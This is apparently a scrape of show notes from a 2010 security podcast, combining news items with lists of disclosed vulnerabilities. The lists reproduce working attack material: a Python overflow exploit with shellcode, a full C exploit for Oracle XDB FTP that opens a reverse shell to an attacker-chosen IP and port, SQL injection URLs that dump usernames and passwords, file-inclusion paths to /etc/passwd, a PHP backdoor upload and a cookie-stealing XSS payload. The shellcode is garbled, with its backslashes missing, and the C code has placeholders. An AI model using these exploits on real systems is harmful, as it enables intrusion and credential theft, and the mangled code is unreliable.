      x03x00x00x00x74x78x74x0Ax00x00x00x48x54x4Dx4Cx20x46x69x6Cx65x73x1Ax00x00x00
      x2Ax2Ex68x74x6Dx6Cx3Bx2Ax2Ex68x74x6Dx3Bx2Ax2Ex73x68x74x6Dx6Cx3Bx2Ax2Ex63x73
      x73x04x00x00x00x68x74x6Dx6Cx0Bx00x00x00x43x2Fx43x2Bx2Bx20x46x69x6Cx65x73x17
      x00x00x00x2Ax2Ex63x3Bx2Ax2Ex63x63x3Bx2Ax2Ex63x70x70x3Bx2Ax2Ex70x63x3Bx2Ax2E
      x68x03x00x00x00x63x70x70x0Ax00x00x00x4Ax61x76x61x20x46x69x6Cx65x73x0Cx00x00
      x00x2Ax2Ex6Ax61x76x61x3Bx2Ax2Ex6Ax61x76x04x00x00x00x6Ax61x76x61x0Ax00x00x00
      x50x65x72x6Cx20x46x69x6Cx65x73x16x00x00x00x2Ax2Ex70x6Cx3Bx2Ax2Ex70x6Dx3Bx2A
      x2Ex70x65x72x6Cx3Bx2Ax2Ex63x67x69x02x00x00x00x70x6Cx0Dx00x00x00x46x6Fx72x74
      x72x61x6Ex20x46x69x6Cx65x73x1Bx00x00x00x2Ax2Ex66x3Bx2Ax2Ex66x6Fx72x3Bx2Ax2E
      x66x37x37x3Bx2Ax2Ex66x39x30x3Bx2Ax2Ex66x39x35x01x00x00x00x66x09x00x00x00x50
      x48x50x20x46x69x6Cx65x73x1Bx00x00x00x2Ax2Ex70x68x70x3Bx2Ax2Ex70x68x74x6Dx6C
      x3Bx2Ax2Ex70x68x70x33x3Bx2Ax2Ex70x68x70x34x03x00x00x00x70x68x70x09x00x00x00
      x4Ax53x50x20x46x69x6Cx65x73x14x00x00x00x2Ax2Ex6Ax73x70x3Bx2Ax2Ex6Ax68x74x6D
      x6Cx3Bx2Ax2Ex6Ax61x76x61x03x00x00x00x6Ax73x70x0Bx00x00x00x4Cx61x54x65x58x20
      x46x69x6Cx65x73x0Bx00x00x00x2Ax2Ex74x65x78x3Bx2Ax2Ex73x74x79x03x00x00x00x74
      x65x78″

      # calc.exe
      sc = (“x89xe1xd9xeexd9x71xf4x58x50x59x49x49x49x49″
      “x43x43x43x43x43x43x51x5ax56x54x58x33x30x56″
      “x58x34x41x50x30x41x33x48x48x30x41x30x30x41″
      “x42x41x41x42x54x41x41x51x32x41x42x32x42x42″
      “x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a”
      “x48x47x34x43x30x45x50x45x50x4cx4bx51x55x47″
      “x4cx4cx4bx43x4cx45x55x42x58x45x51x4ax4fx4c”
      “x4bx50x4fx45x48x4cx4bx51x4fx51x30x43x31x4a”
      “x4bx51x59x4cx4bx50x34x4cx4bx43x31x4ax4ex46″
      “x51x49x50x4cx59x4ex4cx4dx54x49x50x42x54x45″
      “x57x49x51x49x5ax44x4dx43x31x48x42x4ax4bx4c”
      “x34x47x4bx50x54x47x54x45x54x43x45x4bx55x4c”
      “x4bx51x4fx47x54x45x51x4ax4bx45x36x4cx4bx44″
      “x4cx50x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4c”
      “x4bx45x4cx4cx4bx45x51x4ax4bx4cx49x51x4cx46″
      “x44x44x44x48x43x51x4fx50x31x4ax56x45x30x50″
      “x56x42x44x4cx4bx51x56x50x30x4cx4bx51x50x44″
      “x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx43x58x45″
      “x58x4bx39x4ax58x4dx53x49x50x42x4ax50x50x43″
      “x58x4ax50x4dx5ax44x44x51x4fx45x38x4ax38x4b”
      “x4ex4cx4ax44x4ex50x57x4bx4fx4dx37x42x43x43″
      “x51x42x4cx42x43x43x30x41x41″);

      crash = “x41″ * 7147 #7947
      crash += “x90″ * 20
      crash += sc
      crash += “x41″ * (7947-len(crash))
      crash += “xe9xe0xfcxffxff”
      crash += “xebxf9x90x90″
      crash += “xbdx32x46x00″ # [cedt.exe]

      exploit = header + crash
      pwnfile = open(‘cedt.cfg’,'w’);
      pwnfile.write(exploit);
      pwnfile.close()

Stories of Interest:
News item 1: http://www.dvhardware.net/article41781.html
After weeks of unfruitful negotiations with Chinese authorities, Google has stopped censoring results on its Chinese search engine. Starting today, visitors of the Internet giant’s Chinese website are redirected to the Google’s Hong Kong site, which offers Chinese-language service with uncensored results.

Google announced in January that it had traced a sophisticated cyber-attack to China, and as a result would no longer filter results in its Chinese search service. Google acknowledged that the move could result in having to withdraw from direct competition in China, where Internet search sites are required to censor politically sensitive topics.

Since then, Google has sought to engage with Chinese authorities over how it could operate in the country without filtering results. Theoretically, China-based users could continue to connect to sites such as google.com or google.com.hk following the company’s shuttering of google.cn, though their access could become unreliable.

A Chinese government official in charge of the Internet bureau under the State Council Information Office responds to Google, accusing the search engine has “violated its written promise” and is “totally wrong” by stopping censoring its Chinese search results and blaming the Chinese government for alleged hacker attacks:

“Google has violated its written promise it made when entering the Chinese market by stopping filtering its searching service and blaming China in insinuation for alleged hacker attacks,” said the official.

“This is totally wrong. We’re uncompromisingly opposed to the politicization of commercial issues, and express our discontent and indignation to Google for its unreasonable accusations and conducts,” the official said.

News item 2:http://www.stuff.co.nz/technology/3486923/Hackers-crash-Aussie-charity-websites
The internet services of two Australian autism support organizations have been crashed by computer hackers and a third may also have fallen victim, raising fears of a targeted attack to coincide with autism month.

Austism Spectrum Australia (ASPECT), the country’s autism service provider, is losing hundreds of dollars in online donations each day after its website was hit by hackers early on Sunday.   The hackers closed web forums, a group email service and registration pages for events.

The codeword-restricted intranet site for the autism training organisation Positive Partnerships was also hit.   Austism Victoria’s intranet service also went down.
The first two attacks were traced to IP addresses in the United States and experts said they appeared to be deliberate.
News item 3: http://joongangdaily.joins.com/article/view.asp?aid=2918142
A 22-year-old Korean man named Kim is under arrest for purchasing lists of Koreans’ personal information, such as cell phone numbers and e-mail addresses, which had been hacked in China. After spending 1 million won ($880) for 31 million items of data since July of last year, Kim posted an Internet ad and sold off 10 million such items.

A 27-year-old man Lee, who runs a branch for an Internet service provider, was one of the buyers. He spent 3 million won for 140,000 phone numbers for his branch’s telemarketing scheme.

The Seoul Metropolitan Police Agency took in Kim and Lee without physical detention, and also detained the owners of the companies that failed to protect their customer information from computer hackers.

Last September, a used-car trading Web site and the Internet home page for a car navigation manufacturer were victims of Chinese hackers who stole names and residential registration numbers of 910,000 online members. Hackers can use the stolen registration numbers to become members of certain Web sites that send spam messages, or sell the numbers to other hackers.

Seoul police charged a 32-year-old named Kim, the owner of the used-car site, and a 45-year-old named Lee, who runs the navigation maker, for negligence in protecting their customers. information.  The law demands that companies protect their online customers. information, and violations are punishable by a maximum of two years in prison or a 10 million won fine.

News item 4:  http://news.cnet.com/8301-1009_3-20000884-83.html?part=rss&subj=news&tag=2547-1_3-0-20

Google has released an open-source Web security scanner called Skipfish that is designed to allow people to scan Web applications for security holes.

The tool scans a Web application for flaws including “tricky scenarios” such as blind SQL or XML injection, Google developer Michal Zalewski said in the Skipfish wiki.

Skipfish prepares a site map annotated with interactive crawl results, highlighting flaws, after a recursive crawl and dictionary-based probing of the target site. The tool can also generate a final report that can be used as a basis for a security assessment.

News item 5: http://theappleblog.com/2010/03/22/10-6-3-is-imminent%E2%80%A6maybe-the-malwares-not-far-behind/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheAppleBlog+%28TheAppleBlog%29
Here is the full rundown of features and fixes we can expect in 10.6.3;

• Compatibility issues with OpenGL-based applications
• Performance improvements for 64-bit Logic
• Changes to QuickTime X that increase reliability and improve compatibility and security
• Printing reliability and compatibility with third-party printers
• Issues resolved that prevented files from copying to Windows shares
• Issues resolved with recurring events in iCal when connected to an Exchange server
• Issues resolved that prevented files with the “#” or “&” symbols in their names from opening in Rosetta
• Issues addressed that caused background message colors to display incorrectly in Mail when scrolling
• Issue resolved that caused machines using BTMM and the Bonjour Sleep Proxy to wake unexpectedly

News item 6:  http://www.theinquirer.net/inquirer/news/1597220/mac-os-x-zero-day-flaws
Security researcher Charlie Miller, who is already known for having discovered a number of bugs in Mac OS X, told Heise Security that the holes are found in closed source Apple products.

He said that the attack surface of OS X is so wide you can land a 747 on it, sideways.  There are bugs in the open source components and vulnerabilities in the closed source third-party and Apple components. All of which can lead to remote compromise of the Mac OS X operating system.

Miller found all the holes by fuzzing, which involves bombarding an application’s input channels with as much corrupted data as possible. He said that Mac OS X is the safest OS because it is miles away from the action. However it is so full of bugs that any hacker who wants to can easily take it down.

“Mac OS X is like living in a farmhouse in the country with no locks, and Windows is living in a house with bars on the windows in the bad part of town,” Miller said. Apple’s position with regard to security continues to be quite relaxed. “It will not think it has a security problem until it affects [the company's] bottom line, which hasn’t been the case, yet”, he said.

InfoSec Daily Podcast

 
ISD Podcast Episode 92 for March 22, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:

MyHardDriveDied.com:

• Data Recovery Class is $3500 for all classes to reserve and register, please complete this form and return it to me Email: smoulton@nicservices.com or Fax: 770-926-7089, or go to http://www.myharddrivedied.com/seated-class-cc-form.pdf. Here are the current dates and locations for the classes:
  • Washington DC – April 12th to 16th
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Hard Drive Kung Fu Magic – Outerzone 6 2010 by Scott Moulton

SANS Community Atlanta:

• SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. 1. Nensor CMS is subject to remote SQL injection and local file inclusion vulnerabilities. Exploiting this issue could allow an attacker access to sensitive data or complete system compromise.  Version 2.01 is impacted. Example URLS:

      http://www.sample.com/x/modules/javascript.php?sPage=[LFI%00]

      Auth Bypass:
      $sql = “SELECT
      iKey,sUsername,iKeyGroup,bForumAdmin,sLanguage,sPassword,sMail,sType
      FROM tb_users
      WHERE
      sUsername=’”.strInput($_POST["sUsername"]).”‘
      AND sPassword=’”.md5($_POST["sPassword"]).”‘
      AND bActive=1″;

   2. Oracle XDB FTP is subject to a service UNLOCK buffer overflow vulnerabilities. Exploit code is available:
      exploit win32
      #include <stdio.h>
      #include <windows.h>
      #include <winsock.h>

      int GainControlOfOracle(char *, char *);
      int StartWinsock(void);
      int SetUpExploit(char *,int);

      struct sockaddr_in s_sa;
      struct hostent *he;
      unsigned int addr;
      char host[value data]=”";

      //register acces\
      unsigned char exploit[value data]=
      “x55x8BxECxEBx03x5BxEBx05xE8xF8xFFxFFxFFxBExFFxFF”
      “xFFxFFx81xF6xDCxFExFFxFFx03xDEx33xC0x50x50x50x50″
      “x50x50x50x50x50x50xFFxD3x50x68x61x72x79x41x68x4C”
      “x69x62x72x68x4Cx6Fx61x64x54xFFx75xFCxFFx55xF4x89″
      “x45xF0x83xC3x63x83xC3x5Dx33xC9xB1x4ExB2xFFx30x13″
      “x83xEBx01xE2xF9x43x53xFFx75xFCxFFx55xF4x89x45xEC”
      “x83xC3x10x53xFFx75xFCxFFx55xF4x89x45xE8x83xC3x0C”
      “x53xFFx55xF0x89x45xF8x83xC3x0Cx53x50xFFx55xF4x89″
      “x45xE4x83xC3x0Cx53xFFx75xF8xFFx55xF4x89x45xE0x83″
      “xC3x0Cx53xFFx75xF8xFFx55xF4x89x45xDCx83xC3x08x89″
      “x5DxD8x33xD2x66x83xC2x02x54x52xFFx55xE4x33xC0x33″
      “xC9x66xB9x04x01x50xE2xFDx89x45xD4x89x45xD0xBFx0A”
      “x01x01x26x89x7DxCCx40x40x89x45xC8x66xB8xFFxFFx66″
      “x35xFFxCAx66x89x45xCAx6Ax01x6Ax02xFFx55xE0x89x45″
      “xE0x6Ax10x8Dx75xC8x56x8Bx5DxE0x53xFFx55xDCx83xC0″
      “x44x89x85x58xFFxFFxFFx83xC0x5Ex83xC0x5Ex89x45x84″
      “x89x5Dx90x89x5Dx94x89x5Dx98x8DxBDx48xFFxFFxFFx57″
      “x8DxBDx58xFFxFFxFFx57x33xC0x50x50x50x83xC0x01x50″
      “x83xE8x01x50x50x8Bx5DxD8x53x50xFFx55xECxFFx55xE8″
      “x60x33xD2x83xC2x30x64x8Bx02x8Bx40x0Cx8Bx70x1CxAD”
      “x8Bx50x08x52x8BxC2x8BxF2x8BxDAx8BxCAx03x52x3Cx03″
      “x42x78x03x58x1Cx51x6Ax1Fx59x41x03x34x08x59x03x48″
      “x24x5Ax52x8BxFAx03x3Ex81x3Fx47x65x74x50x74x08x83″
      “xC6x04x83xC1x02xEBxECx83xC7x04x81x3Fx72x6Fx63x41″
      “x74x08x83xC6x04x83xC1x02xEBxD9x8BxFAx0FxB7x01x03″
      “x3Cx83x89x7Cx24x44x8Bx3Cx24x89x7Cx24x4Cx5Fx61xC3″
      “x90x90x90xBCx8Dx9Ax9Ex8Bx9AxAFx8Dx90x9Cx9Ax8Cx8C”
      “xBExFFxFFxBAx87x96x8BxABx97x8Dx9Ax9Ex9BxFFxFFxA8″
      “x8CxCDxA0xCCxCDxD1x9Bx93x93xFFxFFxA8xACxBExACx8B”
      “x9Ex8Dx8Bx8Ax8FxFFxFFxA8xACxBExACx90x9Cx94x9Ax8B”
      “xBExFFxFFx9Cx90x91x91x9Ax9Cx8BxFFx9Cx92x9BxFFxFF”
      “xFFxFFxFFxFF”;

      char exploit_code[value data]=
      “UNLOCK / put character”
      “put character”
      “put character”
      “put character”
      “put character” ———>char or nummeric—–or combine
      chart&nummeric
      “5eeefffggghhh”;

      char exception_handler[value dataX]=”x79x9Bxf7x77″;
      char short_jump[value dataX]=”xEBx06x90x90″;

      int main(int argc, char *argv[])
      {

      if(argc != 6)
      {
      printf(“nntOracle XDB FTP Service UNLOCK Buffer Overflow
      Exploit”);
      printf(“nntSpawns a reverse shell to specified port”);
      printf(“nntUsage:t%s host userid password ipaddress
      port”,argv[0]);
      printf(“nt6th maret 2010nnn”);
      return 0;
      }

      strncpy(host,argv[1],250);
      if(StartWinsock()==0)
      return printf(“Error starting Winsock.n”);

      SetUpExploit(argv[4],atoi(argv[5]));

      strcat(exploit_code,short_jump);
      strcat(exploit_code,exception_handler);
      strcat(exploit_code,exploit);
      strcat(exploit_code,”rn”);

      GainControlOfOracle(argv[2],argv[3]);

      return 0;

      }

      int SetUpExploit(char *myip, int myport)—>protocol
      {
      unsigned int ip=0;
      unsigned short prt=0;
      char *ipt=”";
      char *prtt=”";

      ip = inet_addr(myip);

      ipt = (char*)&ip;
      exploit[value data]=ipt[0];
      exploit[value data]=ipt[1];
      exploit[value data]=ipt[2];
      exploit[value data]=ipt[3];

      // set the TCP port to connect on
      // netcat should be listening on this port
      // e.g. nc -l -p 80

      prt = htons((unsigned short)myport);
      prt = prt ^ 0xFFFF;
      prtt = (char *) &prt;
      exploit[value data]=prtt[0];
      exploit[value data]=prtt[1];

      return 0;
      }

      int StartWinsock()
      {
      int err=0;
      WORD wVersionRequested;
      WSADATA wsaData;

      wVersionRequested = MAKEWORD( 2, 0 );
      err = WSAStartup( wVersionRequested, &wsaData );
      if ( err != 0 )
      return 0;
      if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) !=
      0 )
      {
      WSACleanup( );
      return 0;
      }

      if (isalpha(host[0]))
      {
      he = gethostbyname(host);
      s_sa.sin_addr.s_addr=INADDR_ANY;
      s_sa.sin_family=AF_INET;
      memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
      }
      else
      {
      addr = inet_addr(host);
      s_sa.sin_addr.s_addr=INADDR_ANY;
      s_sa.sin_family=AF_INET;
      memcpy(&s_sa.sin_addr,&addr,4);
      he = (struct hostent *)1;
      }

      if (he == NULL)
      {
      return 0;
      }
      return 1;
      }

      int GainControlOfOracle(char *user, char *pass)
      {

      char usercmd[value dataXX]=”user “;
      char passcmd[value dataXX]=”pass “;
      char resp[1600]=”";
      int snd=0,rcv=0;
      struct sockaddr_in r_addr;
      SOCKET sock;

      strncat(usercmd,user,230);
      strcat(usercmd,”rn”);
      strncat(passcmd,pass,230);
      strcat(passcmd,”rn”);

      sock=socket(AF_INET,SOCK_STREAM,0);
      if (sock==INVALID_SOCKET)
      return printf(” sock error”);

      r_addr.sin_family=AF_INET;
      r_addr.sin_addr.s_addr=INADDR_ANY;
      r_addr.sin_port=htons((unsigned short)0);
      s_sa.sin_port=htons((unsigned short)2100);

      if (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR)
      return printf(“Connect error”);

      rcv = recv(sock,resp,1500,0);
      printf(“%s”,resp);
      ZeroMemory(resp,1600);

      snd=send(sock, usercmd , strlen(usercmd) , 0);
      rcv = recv(sock,resp,1500,0);
      printf(“%s”,resp);
      ZeroMemory(resp,1600);

      snd=send(sock, passcmd , strlen(passcmd) , 0);
      rcv = recv(sock,resp,1500,0);
      printf(“%s”,resp);
      if(resp[0]==’5′)
      {
      closesocket(sock);
      return printf(“Failed to log in using user %s and password
      %s.n”,user,pass);
      }
      ZeroMemory(resp,1600);

      snd=send(sock, exploit_code, strlen(exploit_code) , 0);

      Sleep(2000);

      closesocket(sock);
      return 0;
      }

   3. Sahana is subject to an authentication bypass vulnerabilities. Exploiting this issue could allow an attacker access to sensitive data or complete system compromise.  Version 0.6.2.2 is impacted. Example URLS:

      http://www.sample.com/<sahana_path>/stream.php?mod=admin&act=acl_enable_acl

   4. ArGoSoft FTP Server .NET is subject to a directory traversal vulnerability. Exploiting this issue could allow an attacker access to sensitive data or complete system compromise.  Version 1.0.2.1 is impacted. Example commands:
      CWD …
      250 Requested file action OK, completed
      XPWD
      257 “/…/” is working directory
      CWD …
      250 Requested file action OK, completed
      XPWD
      257 “/…/…/” is working directory
   5. The Joomla VXDate component is subject to Cross Site Scripting, Path Disclosure and SQL injection vulnerabilities. Potentially all versions of VXDate are impacted. Path Disclosure example URLs:

      http://www.sample.com/index.php?option=com_vxdate&ct=&#65533;

      http://www.sample.com/index.php?option=com_vxdate&ct=1&md=details&id=&;#65533;

      http://www.sample.com/index.php?option=com_vxdate&ct=1&md=editform&id=&amp;#65533;

      SQL Injection example URLs:

      http://www.sample.com/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5

      http://www.sample.com/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version()=5

      Cross Site Scirpting example URLs:

      http://www.sample.com/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

      http://www.sample.com/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

   6. Philweb is subject to remote SQL injection vulnerability because it fails to santize user supplied inputs in a SQL query. Version 1.02 is impacted. Example URLs:
      http://www.sample.com/buscahost_forum.asp?forumid=Sql ||
   7. phpAuthent is subject to remote SQL injection vulnerability because it fails to santize user supplied inputs in a SQL query. Version 0.2.1 is impacted. Example URL:

      http://www.sample.com/news_releases.php?nid=-1+union+select+1,2,3,username,password,6,7+from+phpauthent_users

Stories of Interest:
News item 1:  http://www.informationweek.com/news/security/cybercrime/showArticle.jhtml?articleID=224000085
The Senate Wednesday re-introduced a cybersecurity bill it considered last year, minus a provision that would have allowed the president to shut down the Internet in the event of a major cyber attack.  The Cybersecurity Act, S. 773, co-sponsored by Senators Jay Rockefeller (D-W.Va.) and Olympia Snowe (R-Maine), is aimed at protecting critical U.S. network infrastructure against cybersecurity threats by fostering collaboration between the federal government and the private sectors that maintain that infrastructure.

The legislation was originally introduced last April in a two-bill package that together called for the creation of a national cybersecurity adviser, as well as aimed to revise cybersecurity processes and oversight in government, facilitate public-private partnerships on keeping computer systems safe, fund cybersecurity research, and encourage the hiring of more cybersecurity specialists.

Companion legislation that would create the national cybersecurity adviser position — the National Cybersecurity Advisor Act, S.778 — is still pending before the Senate Committee on Homeland Security and Government Affairs.

The new Cybersecurity Act more or less maintains the goals of the original bill, but also has some key differences.

One big one is that it no longer gives the president unilateral power to disconnect networks from the Internet in the event of a major cyber attack.

As written now, the bill requires the president to work with organizations that own critical network infrastructure to come up with cybersecurity emergency response plans rather than take action on his own.

News item 2:http://www.cio.com/article/585663/Fired_CISO_Says_His_Comments_Never_Put_Penn._s_Data_At_Risk
Robert Maley admits he was wrong to speak at the RSA security conference and confirmed the state of Pennsylvania fired him. In an interview with ComputerWorld, Maley gives his side on why he talked to other security professionals about issues involving his then-employer’s legacy systems.

What exactly happened?

They terminated me. I was specifically asked not to talk about anything in Pennsylvania without explicit permission and to have everything that I would say to be completely reviewed before I said it. So yeah, they told me that, and, yup, I was wrong ultimately doing that. As far as the official reason, that’s why. It’s not because of the PennDOT incident. It was because I did not have permission to speak. Not just at RSA, I wasn’t permitted to speak anywhere. I was on vacation when I went there. I went out there on my own time.

So what happened at PennDOT?

There’s been a lot of speculation in the press about the PennDOT incident. First, it wasn’t a hacking. It was an anomaly. Something happened. It was caught. It was identified. The incident was closed and the vulnerability was closed as well. I would have never spoken in public about any vulnerability that would have exposed the citizens of the commonwealth. That is something I have never done and never would do. I was using [the PennDOT incident] as an example of legacy applications that are still at risk. The whole purpose of using that as an example is that the people at RSA are the ones who are responsible for protecting their citizens, their company. It helps for people to know what is really going on, about how fast things are changing.

It’s your position that you compromised nothing by speaking at RSA?

Nothing. The vulnerability has been fixed. Everything I talked about was either part of a public submission or was available in press releases. I talked about prior breaches at Pennsylvania, but that was information I got from public press releases.

You talked about this being done on your own time. Should that have made a difference?

When I left, I had put in a vacation request and I was approved. They didn’t appreciate that I was doing it on my own time and they dismissed me. They canceled my vacation and said I was absent without leave … In the dismissal, they said I spoke without approval. My problem is I believe in what I am doing. For me, citizen safety comes first.
News item 3: http://blogs.computerworld.com/15780/federal_trade_honcho_google_is_the_enemy_of_privacy

Google’s greatest threat may not be Microsoft or Apple — instead, it may be the Federal Trade Commission (FTC), which increasingly is putting Google in its cross-hairs for serious privacy violations. Yesterday, Commissioner Pamela Jones Harbour lashed into Google for “irresponsible conduct” related to privacy, and said about Google Buzz, “consumer privacy cannot be run in beta.”

Harbour spoke at an FTC privacy roundtable, and said, according to the Wall Street Journal, “Protecting consumer privacy is of utmost importance. Unfortunately, many of the companies that consumers look to as leaders — and that we expect to be leaders — still have not taken this message entirely to heart.”

She was particularly harsh about Google CEO Eric Schmidt’s statement to CNBC that “If you have something that you don’t want anyone to know, maybe you shouldn’t be doing it in the first place.” And she made clear that the FTC plans to take action if Google and other companies did not change the way they viewed online privacy, saying:

“The Commission will continue to evaluate consumers’ preferences, and armed with these insights, I hope and expect that the Commission will continue to shape the conversation about the intrinsic value of privacy. But make no mistake: The Commission will unfailingly step in to protect consumers where we believe the law has been violated, and that includes violations relating to privacy promises.”

InfoSec Daily Podcast

 
ISD Podcast Episode 91 for March 19, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:

MyHardDriveDied.com:

• Data Recovery Class is $3500 for all classes to reserve and register, please complete this form and return it to me Email: smoulton@nicservices.com or Fax: 770-926-7089, or go to http://www.myharddrivedied.com/seated-class-cc-form.pdf. Here are the current dates and locations for the classes:
  • Washington DC – April 12th to 16th
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th

OuterZ0ne:

• Outerz0ne March 19th and 20th near the Atlanta airport. Here’s their site for more info: http://www.outerz0ne.org/
• Starts early Saturday morning at the Wellseley Inn Atlanta Airport Hotel (http://www.wellesleyinnatlanta.com) 1377 Virginia Avenue, Atlanta, GA 30344 (404) 762-5111
• The next DC404 meeting will be at Outerz0ne

SANS Community Atlanta:

• SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. 1. Chilly CMS is subject to a Cross Site Request Forgery (CSRF) vulnerability.  Proof of concept is available: http://www.opensourcecms.com/demo/2/292/chillyCMS
   2. Chilly CMS is subject to a persistent Cross Site Scripting (XSS) vulnerability. In ADD LINKS Field provide the malicious script to store in the Database. Proof of concept is available: http://www.opensourcecms.com/demo/2/292/chillyCMS/admin/usergroups.site.php
   3. Short URL is subject to a Local File Inclusion (LFI) vulnerability. Version 1.01 is impacted. Example URL is available: http://www.sample.com/staff/app/common.inc.php?LANG_CODE=../../../../../../../etc/passwd%00
   4. FCKEditor is subject to a Shell Upload vulnerability. Version 2.0 RC3 is impacted. You can upload a php backdoor with this
      extension: .php3. Example URL is available: http://www.sample.com/editor/filemanager/browser/default/browser.html?Connector=/editor/filemanager/browser/default/connectors/php/connector.php
   5. phpBB2 Plus is subject to a SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.  Version 1.53 is impacted. Google Dork : inurl:kb.php?mode=cat&cat=. Example URL is available: http://www.sample.com/xxxxxx/kb.php?mode=cat&cat=-1+union+select+1,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6,7+from+phpbb_users+limit+1,2–
   6. philboard is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The issue affects philboard 1.02; other versions may also be affected.  Example URL is available: http://www.sample.com/path/buscahost_forum.asp?forumid=Sql
   7. Softsaurus is subject to multiple Remote File Inclusion (RFI) vulnerabilities.  Version 2.01 is impacted, though others maybe as well.  Exmaple URLs are available:

      http://www.sample.com/content/plugins/wallpapers/wallpapers.php?includes_path=[Shell]

      http://www.sample.com/content/themes/softsaurus_default/pages/subHeader.php?objects_path=[Shell]

      http://www.sample.com/content/themes/softsaurus_stretched/pages/subHeader.php?objects_path=[Shell]

   8. PHP’s xmlrpc extension library is subject to multiple denial-of-service vulnerabilities because it fails to properly handle crafted XML-RPC requests. Exploiting these issues allows remote attackers to cause denial-of-service conditions in the context of an application using the vulnerable library. PHP 5.3.1 is vulnerable; other versions may also be affected. Example php code is available:
      <?php
      $req = ‘<?xml version=”1.0″?>
      <methodCall>
      </methodCall>’;
      $result = xmlrpc_decode_request( $req, $frop );
      ?>

Stories of Interest:
News item 1:  http://www.v3.co.uk/v3/news/2259634/sec-sues-hacker-manipulating
The US Securities and Exchange Commission (SEC) has accused a Russian man of illegally manipulating share prices by hijacking people’s online trading accounts.  Valery Maltsev, who runs a firm called BroCo, is accused of stealing the login details for online share trading accounts and then using them to place orders for stock in which he had already taken a position.

Between August 2009 and December 2009 orders were placed at either a higher or lower price than was publically quoted, enabling Maltsev to make a profit two different ways according to the SEC’s court filing.

“These transactions have created the appearance of legitimate trading activity and have artificially affected the prices of at least 38 issuers,” the Securities and Exchange Commission said in court filing.

News item 2:http://www.liquidmatrix.org/blog/2010/03/16/are-the-feds-in-your-social-network/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Liquidmatrix+%28Liquidmatrix%29

From Wired:

The next time someone tries to “friend” you on Facebook, it may turn out to be an undercover fed looking to examine your private messages and photos, or surveil your friends and family. The Electronic Frontier Foundation has obtained an internal Justice Department document that describes what law enforcement is doing on social networking sites.

The 33-page document shows that law enforcement agents from local police to the FBI and Secret Service have been logging on to MySpace and other sites undercover to communicate with suspects, read private postings and view photos and videos that are restricted to a user’s friends.

http://www.wired.com/images_blogs/threatlevel/2010/03/social-networking-for-law-enforcement.pdf

News item 3: http://www.v3.co.uk/computing/news/2259522/security-experts-warns-firms
Medium- and lower-risk flaws are being used more by hackers to penetrate enterprise networks, due to firms taking longer to patch them.  Security experts have warned businesses that hackers are moving their focus from flaws designated as high risk by software vendors to flaws normally seen as lower risks.

Lloyd’s of London chief information security officer Marcus Alldrick  said, ” [Hackers] are not going for the normal high risk flaws, they’re going for the medium risk ones. In the patch management cycle, the medium risk flaws are being patched later.”

That delay in patching is also being exacerbated by hackers combining the lower-risk flaws to create so-called blended threats, explained BT global head of business continuity, security & governance practice Ray Stanton. By combining two lower-risk flaws, hackers can cause high-risk threats
to an organization.

“individually a lot of those low or medium threats may not pose a great risk, when you connect them together, it gives the opportunity to use ‘blended’ threats.”

News item 4: http://technologyexpert.blogspot.com/2010/03/disgrunted-former-employee-remotely.html
A disgruntled former employee of Austin-based car dealership Texas Auto Center disabled over 100 cars, sometimes setting their horns honking wildly by hacking into an Austin-based car dealership’s immobilization technology, which was designed to be used for repossessing cars. The suspect, Oscar Ramos-Lopez, 20, has been arrested and charged with breach of computer security.

